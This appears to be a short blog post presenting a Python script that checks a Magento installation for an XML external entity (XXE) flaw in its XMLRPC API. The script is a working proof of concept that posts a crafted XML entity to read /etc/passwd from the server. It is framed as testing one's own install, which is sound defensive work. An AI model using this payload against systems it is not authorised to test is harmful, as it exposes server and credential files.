Contents
If you want to check your magento installation whether it was affected by the XXE injection inside XMLRPC API I will show you my short pythonscript for it. For that you'll need Python/Requests. And the following script which you might need to configure for your installation:
import requests url = 'http://127.0.0.1/magento16/api/xmlrpc' filename ="/etc/passwd" data = """<?xml version="1.0"?> <!DOCTYPE foo [ <!ELEMENT methodName ANY > <!ENTITY xxe SYSTEM "file://"""+filename+"""">]> <methodCall> <methodName>&xxe;</methodName> </methodCall>""" print data r = requests.post(url, data=data) print r.text
It doesn't look like much, but the hard part was to find out, how to post data in a non html-form like way.
My own tests with this showed me, that nearly no file is accessible from outside.
Commentaires: